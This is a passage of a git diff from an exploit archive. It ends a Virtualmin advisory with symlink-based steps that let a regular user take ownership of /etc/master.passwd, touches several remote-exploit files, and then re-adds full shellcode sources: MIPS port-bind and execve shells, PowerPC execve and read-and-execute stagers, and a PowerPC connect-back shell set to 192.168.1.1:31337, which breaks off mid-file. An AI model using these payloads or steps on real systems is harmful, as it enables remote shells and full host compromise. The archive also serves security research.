attack, which may lead to a full compromise of the +server. + +Example for "Backup Virtual Servers": +1) Regular user creates backupdir and symlink: + $ mkdir virtualmin-backup && ln -s /etc/master.passwd +virtualmin-backup/test + $ ls -la /etc/master.passwd + -rw------- 1 root wheel 1024 Jan 19 23:08 /etc/master.passwd + +2) From the panel regular user creates backup: + "Backup and Restore" -> "Backup Virtual Servers" and "Destination and +format" + +set options to: + + Backup destination [x] File or directory under virtualmin-backup/ - "test" + Backup format [x] Single archive file + +and create backup by submitting "Backup Now". 
+
+3) Regular user now owns the symlinked file:
+ $ ls -la /etc/master.passwd
+ -rw------- 1 user user 1024 Jan 21 00:51 /etc/master.passwd
+
+Status:
+The vendor has provided updates and solutions to all vulnerabilities
+described above. Upgrading immediately is strongly recommended for all
+Virtualmin users.
+
+Disclosure timeline:
+21 VI 2009: Detailed information with examples and PoCs sent to the vendor.
+24 VI 2009: Initial vendor response.
+25 VI 2009: Few more vulnerabilities with examples and PoCs sent to the
+vendor.
+26 VI 2009: Hot fix for the mysql module released by the vendor.
+05 VII 2009: New version of the Virtualmin with fixes released by the
+vendor.
+14 VII 2009: Security bulletin released.
+
+Links:
+* http://www.virtualmin.com/
+* http://www.virtualmin.com/node/10412
+* http://www.virtualmin.com/node/10413
+
+
+Best regards,
+Filip Palian
+
+# milw0rm.com [2009-07-14]
diff --git a/platforms/linux/remote/915.c b/platforms/linux/remote/915.c
index b988fb8fa..b187b24a2 100755
--- a/platforms/linux/remote/915.c
+++ b/platforms/linux/remote/915.c
@@ -240,6 +240,6 @@ void help(char *program_name) {
 printf("Target List:\n");
 for(i = 0; targets[i].platform; i++)
 printf("\t\t%d\t %s\n", i, targets[i].platform);
-}
-
-// milw0rm.com [2005-04-05]
+}
+
+// milw0rm.com [2005-04-05]
diff --git a/platforms/linux/remote/934.c b/platforms/linux/remote/934.c
index 6b63a6388..5c8eebcf1 100755
--- a/platforms/linux/remote/934.c
+++ b/platforms/linux/remote/934.c
@@ -426,6 +426,6 @@ fprintf(stdout," {%d} : %s\n",i,platform[i].os_type);
 fprintf(stdout,"\n Example: %s -t 0 -h localhost\n",args);
 fprintf(stdout," Example: %s -r 0x82828282 -s 0x82828282 -f 15\n\n",args);
 exit(0);
-}
-
-// milw0rm.com [2005-04-13]
+}
+
+// milw0rm.com [2005-04-13]
diff --git a/platforms/linux/remote/940.c b/platforms/linux/remote/940.c
index 4e4143921..6fb058947 100755
--- a/platforms/linux/remote/940.c
+++ b/platforms/linux/remote/940.c
@@ -397,6 +397,6 @@ void usage(char *progname){
 printf(" -l \tdistance from the start pointer. (\"GET\")\n");
 printf(" -n \tadds to the overwritten \"kk\" integer.\n\n");
 exit(0);
-}
-
-// milw0rm.com [2005-04-14]
+}
+
+// milw0rm.com [2005-04-14]
diff --git a/platforms/linux/remote/970.c b/platforms/linux/remote/970.c
index 4df775f23..348ecff93 100755
--- a/platforms/linux/remote/970.c
+++ b/platforms/linux/remote/970.c
@@ -556,6 +556,6 @@ main ( int argc, char* argv[] )
 }
 close ( s );
 return 0;
-}
-
-// milw0rm.com [2005-04-29]
+}
+
+// milw0rm.com [2005-04-29]
diff --git a/platforms/linux/remote/981.c b/platforms/linux/remote/981.c
index b4b9658c9..3e36e6ab0 100755
--- a/platforms/linux/remote/981.c
+++ b/platforms/linux/remote/981.c
@@ -492,6 +492,6 @@ main ( int argc, char* argv[] )
 }
 close ( s );
 return 0;
-}
-
-// milw0rm.com [2005-05-05]
+}
+
+// milw0rm.com [2005-05-05]
diff --git a/platforms/linux/remote/99.c b/platforms/linux/remote/99.c
index 4673b950a..1037523c0 100755
--- a/platforms/linux/remote/99.c
+++ b/platforms/linux/remote/99.c
@@ -844,6 +844,6 @@ int main(int argc, char *argv[]) {
 /* go for it */
 own(*target,from,sub,to);
 exit(0);
-}
-
-// milw0rm.com [2003-09-16]
+}
+
+// milw0rm.com [2003-09-16]
diff --git a/platforms/linux_mips/shellcode/13298.c b/platforms/linux_mips/shellcode/13298.c
index a28891e77..1118a2645 100755
--- a/platforms/linux_mips/shellcode/13298.c
+++ b/platforms/linux_mips/shellcode/13298.c
@@ -1,92 +1,92 @@ -/* - MIPS little-endian - * - linux port listener 276 bytes shellcode - * - execve("/bin/sh",["/bin/sh"],[]); - * - port 0x1337 (4919) - * - tested on Linksys WRT54G/GL (DD-WRT Linux) - * - based on scut paper Writing MIPS/Irix shellcode - * - * vaicebine at gmail dot com - */ -#include - -char port_bind_shellcode[] = - "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */ - "\xfd\xff\x0e\x24" /* li t6,-3 */ - "\x27\x20\xc0\x01" /* nor a0,t6,zero */ - "\x27\x28\xc0\x01" /* nor a1,t6,zero */ - "\xff\xff\x06\x28" /* slti a2,zero,-1 */ - "\x57\x10\x02\x24" /* li v0,4183 ( __NR_socket ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ - "\xef\xff\x0e\x24" /* li t6,-17 */ - "\x27\x70\xc0\x01" /* nor t6,t6,zero */ - "\x13\x37\x0d\x24" /* li t5,0x3713 (port 0x1337) */ - "\x04\x68\xcd\x01" /* sllv t5,t5,t6 */ - "\xff\xfd\x0e\x24" /* li t6,-513 */ - "\x27\x70\xc0\x01" /* nor t6,t6,zero */ - "\x25\x68\xae\x01" /* or t5,t5,t6 */ - "\xe0\xff\xad\xaf" /* sw t5,-32(sp) */ - "\xe4\xff\xa0\xaf" /* sw zero,-28(sp) */ - "\xe8\xff\xa0\xaf" /* sw zero,-24(sp) */ - "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xef\xff\x0e\x24" /* li t6,-17 */ - "\x27\x30\xc0\x01" /* nor a2,t6,zero */ - "\xe0\xff\xa5\x23" /* addi a1,sp,-32 */ - "\x49\x10\x02\x24" /* li v0,4169 ( __NR_bind ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\x01\x01\x05\x24" /* li a1,257 */ - "\x4e\x10\x02\x24" /* li v0,4174 ( __NR_listen ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xff\xff\x05\x28" /* slti a1,zero,-1 */ - "\xff\xff\x06\x28" /* slti a2,zero,-1 */ - "\x48\x10\x02\x24" /* li v0,4168 ( __NR_accept ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ - 
"\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xfd\xff\x0f\x24" /* li t7,-3 */ - "\x27\x28\xe0\x01" /* nor a1,t7,zero */ - "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\x01\x01\x05\x28" /* slti a1,zero,0x0101 */ - "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xff\xff\x05\x28" /* slti a1,zero,-1 */ - "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x50\x73\x06\x24" /* li a2,0x7350 */ - "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\xff\xff\x06\x28" /* slti a2,zero,-1 */ - "\xdb\xff\x0f\x24" /* li t7,-37 */ - "\x27\x78\xe0\x01" /* nor t7,t7,zero */ - "\x21\x20\xef\x03" /* addu a0,ra,t7 */ - "\xf0\xff\xa4\xaf" /* sw a0,-16(sp) */ - "\xf4\xff\xa0\xaf" /* sw zero,-12(sp) */ - "\xf0\xff\xa5\x23" /* addi a1,sp,-16 */ - "\xab\x0f\x02\x24" /* li v0,4011 ( __NR_execve ) */ - "\x0c\x01\x01\x01" /* syscall */ - "/bin/sh"; - -int main() -{ - void (*p)(void); - p = port_bind_shellcode; - printf("shellcode size %d\n", sizeof(port_bind_shellcode)); - p(); - - return 0; -} - +/* - MIPS little-endian + * - linux port listener 276 bytes shellcode + * - execve("/bin/sh",["/bin/sh"],[]); + * - port 0x1337 (4919) + * - tested on Linksys WRT54G/GL (DD-WRT Linux) + * - based on scut paper Writing MIPS/Irix shellcode + * + * vaicebine at gmail dot com + */ +#include + +char port_bind_shellcode[] = + "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */ + "\xfd\xff\x0e\x24" /* li t6,-3 */ + "\x27\x20\xc0\x01" /* nor a0,t6,zero */ + "\x27\x28\xc0\x01" /* nor a1,t6,zero */ + "\xff\xff\x06\x28" /* slti a2,zero,-1 */ + "\x57\x10\x02\x24" /* li v0,4183 ( __NR_socket ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li 
t7,0x7350 (nop) */ + "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ + "\xef\xff\x0e\x24" /* li t6,-17 */ + "\x27\x70\xc0\x01" /* nor t6,t6,zero */ + "\x13\x37\x0d\x24" /* li t5,0x3713 (port 0x1337) */ + "\x04\x68\xcd\x01" /* sllv t5,t5,t6 */ + "\xff\xfd\x0e\x24" /* li t6,-513 */ + "\x27\x70\xc0\x01" /* nor t6,t6,zero */ + "\x25\x68\xae\x01" /* or t5,t5,t6 */ + "\xe0\xff\xad\xaf" /* sw t5,-32(sp) */ + "\xe4\xff\xa0\xaf" /* sw zero,-28(sp) */ + "\xe8\xff\xa0\xaf" /* sw zero,-24(sp) */ + "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xef\xff\x0e\x24" /* li t6,-17 */ + "\x27\x30\xc0\x01" /* nor a2,t6,zero */ + "\xe0\xff\xa5\x23" /* addi a1,sp,-32 */ + "\x49\x10\x02\x24" /* li v0,4169 ( __NR_bind ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\x01\x01\x05\x24" /* li a1,257 */ + "\x4e\x10\x02\x24" /* li v0,4174 ( __NR_listen ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xff\xff\x05\x28" /* slti a1,zero,-1 */ + "\xff\xff\x06\x28" /* slti a2,zero,-1 */ + "\x48\x10\x02\x24" /* li v0,4168 ( __NR_accept ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xfd\xff\x0f\x24" /* li t7,-3 */ + "\x27\x28\xe0\x01" /* nor a1,t7,zero */ + "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\x01\x01\x05\x28" /* slti a1,zero,0x0101 */ + "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xff\xff\x05\x28" /* slti a1,zero,-1 */ + "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* 
li t7,0x7350 (nop) */ + "\x50\x73\x06\x24" /* li a2,0x7350 */ + "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\xff\xff\x06\x28" /* slti a2,zero,-1 */ + "\xdb\xff\x0f\x24" /* li t7,-37 */ + "\x27\x78\xe0\x01" /* nor t7,t7,zero */ + "\x21\x20\xef\x03" /* addu a0,ra,t7 */ + "\xf0\xff\xa4\xaf" /* sw a0,-16(sp) */ + "\xf4\xff\xa0\xaf" /* sw zero,-12(sp) */ + "\xf0\xff\xa5\x23" /* addi a1,sp,-16 */ + "\xab\x0f\x02\x24" /* li v0,4011 ( __NR_execve ) */ + "\x0c\x01\x01\x01" /* syscall */ + "/bin/sh"; + +int main() +{ + void (*p)(void); + p = port_bind_shellcode; + printf("shellcode size %d\n", sizeof(port_bind_shellcode)); + p(); + + return 0; +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/linux_mips/shellcode/13299.c b/platforms/linux_mips/shellcode/13299.c index 35dde1dc2..4d1048c5a 100755 --- a/platforms/linux_mips/shellcode/13299.c +++ b/platforms/linux_mips/shellcode/13299.c 
@@ -1,39 +1,39 @@
-/* - MIPS little-endian
- * - linux execve 60 bytes shellcode
- * - execve("/bin/sh",["/bin/sh"],[]);
- * - tested on Linksys WRT54G/GL (DD-WRT Linux)
- * - based on scut paper Writing MIPS/Irix shellcode
- *
- * vaicebine at gmail dot com
- */
-#include
-
-
-char shellcode[] = {
- "\x50\x73\x06\x24" /* li a2,0x7350 */
- "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */
- "\x50\x73\x0f\x24" /* li $t7,0x7350 (nop) */
- "\xff\xff\x06\x28" /* slti a2, $0,-1 */
- "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */
- "\xd7\xff\x0f\x24" /* li t7,-41 */
- "\x27\x78\xe0\x01" /* nor t7,t7,zero */
- "\x21\x20\xef\x03" /* addu a0,ra,t7 */
- "\xe8\xff\xa4\xaf" /* sw a0,-24(sp) */
- "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */
- "\xe8\xff\xa5\x23" /* addi a1,sp,-24 */
- "\xab\x0f\x02\x24" /* li v0,4011 */
- "\x0c\x01\x01\x01" /* syscall */
- "/bin/sh"
-};
-
-int main(int argc, char *argv[])
-{
- void (*p)(void);
- p = shellcode;
- printf("shellcode size %d\n", sizeof(shellcode));
- p();
-
- return 0;
-}
-
+/* - MIPS little-endian
+ * - linux execve 60 bytes shellcode
+ * - execve("/bin/sh",["/bin/sh"],[]);
+ * - tested on Linksys WRT54G/GL (DD-WRT Linux)
+ * - based on scut paper Writing MIPS/Irix shellcode
+ *
+ * vaicebine at gmail dot com
+ */
+#include
+
+
+char shellcode[] = {
+ "\x50\x73\x06\x24" /* li a2,0x7350 */
+ "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */
+ "\x50\x73\x0f\x24" /* li $t7,0x7350 (nop) */
+ "\xff\xff\x06\x28" /* slti a2, $0,-1 */
+ "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */
+ "\xd7\xff\x0f\x24" /* li t7,-41 */
+ "\x27\x78\xe0\x01" /* nor t7,t7,zero */
+ "\x21\x20\xef\x03" /* addu a0,ra,t7 */
+ "\xe8\xff\xa4\xaf" /* sw a0,-24(sp) */
+ "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */
+ "\xe8\xff\xa5\x23" /* addi a1,sp,-24 */
+ "\xab\x0f\x02\x24" /* li v0,4011 */
+ "\x0c\x01\x01\x01" /* syscall */
+ "/bin/sh"
+};
+
+int main(int argc, char *argv[])
+{
+ void (*p)(void);
+ p = shellcode;
+ printf("shellcode size %d\n", sizeof(shellcode));
+ p();
+
+ return 0;
+}
+
 //
milw0rm.com [2008-08-18]
\ No newline at end of file
diff --git a/platforms/linux_mips/shellcode/13300.c b/platforms/linux_mips/shellcode/13300.c
index 135428d31..5b858f8e5 100755
--- a/platforms/linux_mips/shellcode/13300.c
+++ b/platforms/linux_mips/shellcode/13300.c
@@ -1,31 +1,31 @@
-/* 56 bytes execve /bin/sh shellcode - linux-mipsel
- * - by core (core@bokeoa.com)
- *
- * Note: For MIPS running in little-endian mode.
- * Tested on a Cobalt Qube2 server running Linux 2.4.18
- *
- * Greetz to bighawk... i couldn't get his execve to work
- * for some reason :/
- */
-
-char code[] =
-/* 16 byte setreuid(0,0) by bighawk */
-//"\xff\xff\x04\x30\xff\xff\x05\x30"
-//"\xe6\x0f\x02\x34\xcc\x48\x49\x03"
-
-/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
-"\xff\xff\x10\x04\xab\x0f\x02\x24"
-"\x55\xf0\x46\x20\x66\x06\xff\x23"
-"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
-"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
-"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
-"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
-"/bin/sh";
-
-main() {
- void (*a)() = (void *)code;
- printf("size: %d bytes\n", sizeof(code));
- a();
-}
-
+/* 56 bytes execve /bin/sh shellcode - linux-mipsel
+ * - by core (core@bokeoa.com)
+ *
+ * Note: For MIPS running in little-endian mode.
+ * Tested on a Cobalt Qube2 server running Linux 2.4.18
+ *
+ * Greetz to bighawk... i couldn't get his execve to work
+ * for some reason :/
+ */
+
+char code[] =
+/* 16 byte setreuid(0,0) by bighawk */
+//"\xff\xff\x04\x30\xff\xff\x05\x30"
+//"\xe6\x0f\x02\x34\xcc\x48\x49\x03"
+
+/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
+"\xff\xff\x10\x04\xab\x0f\x02\x24"
+"\x55\xf0\x46\x20\x66\x06\xff\x23"
+"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
+"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
+"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
+"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
+"/bin/sh";
+
+main() {
+ void (*a)() = (void *)code;
+ printf("size: %d bytes\n", sizeof(code));
+ a();
+}
+
 // milw0rm.com [2005-11-09]
\ No newline at end of file
diff --git a/platforms/linux_ppc/shellcode/13301.c b/platforms/linux_ppc/shellcode/13301.c
index ee1ec72f2..b57317048 100755
--- a/platforms/linux_ppc/shellcode/13301.c
+++ b/platforms/linux_ppc/shellcode/13301.c
@@ -1,28 +1,28 @@
-/* execve-core.c by Charles Stevenson */
-char hellcode[] = /* execve /bin/sh linux/ppc by core */
-// Sometimes you can comment out the next line if space is needed
-"\x7c\x3f\x0b\x78" /*mr r31,r1*/
-"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
-"\x42\x40\xff\xf9" /*bdzl+ 10000454
 */
-"\x7f\x08\x02\xa6" /*mflr r24*/
-"\x3b\x18\x01\x34" /*addi r24,r24,308*/
-"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
-"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
-"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
-"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
-"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
-"\x3b\xc0\x01\x60" /*li r30,352*/
-"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
-"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
-"/bin/shZ"; // the last byte becomes NULL
-
-int main(void)
-{
- void (*shell)() = (void *)&hellcode;
- printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n",
- strlen(hellcode));
- shell();
- return 0;
-}
-
+/* execve-core.c by Charles Stevenson */
+char hellcode[] = /* execve /bin/sh linux/ppc by core */
+// Sometimes you can comment out the next line if space is needed
+"\x7c\x3f\x0b\x78" /*mr r31,r1*/
+"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
+"\x42\x40\xff\xf9" /*bdzl+ 10000454
 */
+"\x7f\x08\x02\xa6" /*mflr r24*/
+"\x3b\x18\x01\x34" /*addi r24,r24,308*/
+"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
+"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
+"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
+"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
+"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
+"\x3b\xc0\x01\x60" /*li r30,352*/
+"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
+"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
+"/bin/shZ"; // the last byte becomes NULL
+
+int main(void)
+{
+ void (*shell)() = (void *)&hellcode;
+ printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n",
+ strlen(hellcode));
+ shell();
+ return 0;
+}
+
 // milw0rm.com [2005-11-09]
\ No newline at end of file
diff --git a/platforms/linux_ppc/shellcode/13302.c b/platforms/linux_ppc/shellcode/13302.c
index 77e296d23..9cb5291dc 100755
--- a/platforms/linux_ppc/shellcode/13302.c
+++ b/platforms/linux_ppc/shellcode/13302.c
@@ -1,21 +1,21 @@
-/* readnexecppc-core.c by Charles Stevenson */
-char hellcode[] = /* read(0,stack,1028); stack(); linux/ppc by core */
-"\x7c\x63\x1a\x79" /* xor. r3,r3,r3 */
-"\x38\xa0\x04\x04" /* li r5,1028 */
-"\x30\x05\xfb\xff" /* addic r0,r5,-1025 */
-"\x7c\x24\x0b\x78" /* mr r4,r1 */
-"\x44\xde\xad\xf2" /* sc */
-"\x69\x69\x69\x69" /* nop */
-"\x7c\x29\x03\xa6" /* mtctr r1 */
-"\x4e\x80\x04\x21"; /* bctrl */
-
-int main(void)
-{
- void (*shell)() = (void *)&hellcode;
- printf("%d byte read & exec shellcode for linux/ppc by core\n",
- strlen(hellcode));
- shell();
- return 0;
-}
-
+/* readnexecppc-core.c by Charles Stevenson */
+char hellcode[] = /* read(0,stack,1028); stack(); linux/ppc by core */
+"\x7c\x63\x1a\x79" /* xor. r3,r3,r3 */
+"\x38\xa0\x04\x04" /* li r5,1028 */
+"\x30\x05\xfb\xff" /* addic r0,r5,-1025 */
+"\x7c\x24\x0b\x78" /* mr r4,r1 */
+"\x44\xde\xad\xf2" /* sc */
+"\x69\x69\x69\x69" /* nop */
+"\x7c\x29\x03\xa6" /* mtctr r1 */
+"\x4e\x80\x04\x21"; /* bctrl */
+
+int main(void)
+{
+ void (*shell)() = (void *)&hellcode;
+ printf("%d byte read & exec shellcode for linux/ppc by core\n",
+ strlen(hellcode));
+ shell();
+ return 0;
+}
+
 // milw0rm.com [2005-11-09]
\ No newline at end of file
diff --git a/platforms/linux_ppc/shellcode/13303.c b/platforms/linux_ppc/shellcode/13303.c
index b8f204cc6..9283a6a86 100755
--- a/platforms/linux_ppc/shellcode/13303.c
+++ b/platforms/linux_ppc/shellcode/13303.c
@@ -1,82 +1,82 @@ -/* connect-core5.c by Charles Stevenson */ -char hellcode[] = /* connect back & execve /bin/sh linux/ppc by core */ -"\x7c\x3f\x0b\x78" /*mr r31,r1*/ -"\x3b\x40\x01\x0e" /*li r26,270*/ -"\x3b\x5a\xfe\xf4" /*addi r26,r26,-268*/ -"\x7f\x43\xd3\x78" /*mr r3,r26*/ -"\x3b\x60\x01\x0d" /*li r27,269*/ -"\x3b\x7b\xfe\xf4" /*addi r27,r27,-268*/ -"\x7f\x64\xdb\x78" /*mr r4,r27*/ -"\x7c\xa5\x2a\x78" /*xor r5,r5,r5*/ -"\x7c\x3c\x0b\x78" /*mr r28,r1*/ -"\x3b\x9c\x01\x0c" /*addi r28,r28,268*/ -"\x90\x7c\xff\x08" /*stw r3,-248(r28)*/ -"\x90\x9c\xff\x0c" /*stw r4,-244(r28)*/ -"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ -"\x7f\x63\xdb\x78" /*mr r3,r27*/ -"\x3b\xdf\x01\x0c" /*addi r30,r31,268*/ -"\x38\x9e\xff\x08" /*addi r4,r30,-248*/ -"\x3b\x20\x01\x98" /*li r25,408*/ -"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"\x7c\x78\x1b\x78" /*mr r24,r3*/ -"\xb3\x5e\xff\x16" /*sth r26,-234(r30)*/ -"\x7f\xbd\xea\x78" /*xor r29,r29,r29*/ -// Craft your exploit to poke these value in. Right now it's set -// for port 31337 and ip 192.168.1.1. 
Here's an example -// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 -// 0xc0a8 -// 0x0101 -"\x63\xbd" /* PORT # */ "\x7a\x69" /*ori r29,r29,31337*/ -"\xb3\xbe\xff\x18" /*sth r29,-232(r30)*/ -"\x3f\xa0" /*IP(A.B) */ "\xc0\xa8" /*lis r29,-16216*/ -"\x63\xbd" /*IP(C.D) */ "\x01\x01" /*ori r29,r29,257*/ -"\x93\xbe\xff\x1a" /*stw r29,-230(r30)*/ -"\x93\x1c\xff\x08" /*stw r24,-248(r28)*/ -"\x3a\xde\xff\x16" /*addi r22,r30,-234*/ -"\x92\xdc\xff\x0c" /*stw r22,-244(r28)*/ -"\x3b\xa0\x01\x1c" /*li r29,284*/ -"\x38\xbd\xfe\xf4" /*addi r5,r29,-268*/ -"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ -"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ -"\x7c\x7a\xda\x14" /*add r3,r26,r27*/ -"\x38\x9c\xff\x08" /*addi r4,r28,-248*/ -"\x44\xde\xad\xf2" /*.long0x44deadf2*/ -"\x7f\x03\xc3\x78" /*mr r3,r24*/ -"\x7c\x84\x22\x78" /*xor r4,r4,r4*/ -"\x3a\xe0\x01\xf8" /*li r23,504*/ -"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"\x7f\x03\xc3\x78" /*mr r3,r24*/ -"\x7f\x64\xdb\x78" /*mr r4,r27*/ -"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -// comment out the next 4 lines to save 16 bytes and lose stderr -//"\x7f\x03\xc3\x78" /*mr r3,r24*/ -//"\x7f\x44\xd3\x78" /*mr r4,r26*/ -//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -//"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ -"\x42\x40\xff\x35" /*bdzl+ 10000454
*/ -"\x7f\x08\x02\xa6" /*mflr r24*/ -"\x3b\x18\x01\x34" /*addi r24,r24,308*/ -"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ -"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ -"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ -"\x38\x81\xff\xf8" /*addi r4,r1,-8*/ -"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ -"\x3b\xc0\x01\x60" /*li r30,352*/ -"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"/bin/shZ"; /* Z will become NULL */ - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte connect back execve /bin/sh for linux/ppc by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* connect-core5.c by Charles Stevenson */ +char hellcode[] = /* connect back & execve /bin/sh linux/ppc by core */ +"\x7c\x3f\x0b\x78" /*mr r31,r1*/ +"\x3b\x40\x01\x0e" /*li r26,270*/ +"\x3b\x5a\xfe\xf4" /*addi r26,r26,-268*/ +"\x7f\x43\xd3\x78" /*mr r3,r26*/ +"\x3b\x60\x01\x0d" /*li r27,269*/ +"\x3b\x7b\xfe\xf4" /*addi r27,r27,-268*/ +"\x7f\x64\xdb\x78" /*mr r4,r27*/ +"\x7c\xa5\x2a\x78" /*xor r5,r5,r5*/ +"\x7c\x3c\x0b\x78" /*mr r28,r1*/ +"\x3b\x9c\x01\x0c" /*addi r28,r28,268*/ +"\x90\x7c\xff\x08" /*stw r3,-248(r28)*/ +"\x90\x9c\xff\x0c" /*stw r4,-244(r28)*/ +"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ +"\x7f\x63\xdb\x78" /*mr r3,r27*/ +"\x3b\xdf\x01\x0c" /*addi r30,r31,268*/ +"\x38\x9e\xff\x08" /*addi r4,r30,-248*/ +"\x3b\x20\x01\x98" /*li r25,408*/ +"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"\x7c\x78\x1b\x78" /*mr r24,r3*/ +"\xb3\x5e\xff\x16" /*sth r26,-234(r30)*/ +"\x7f\xbd\xea\x78" /*xor r29,r29,r29*/ +// Craft your exploit to poke these value in. Right now it's set +// for port 31337 and ip 192.168.1.1. 
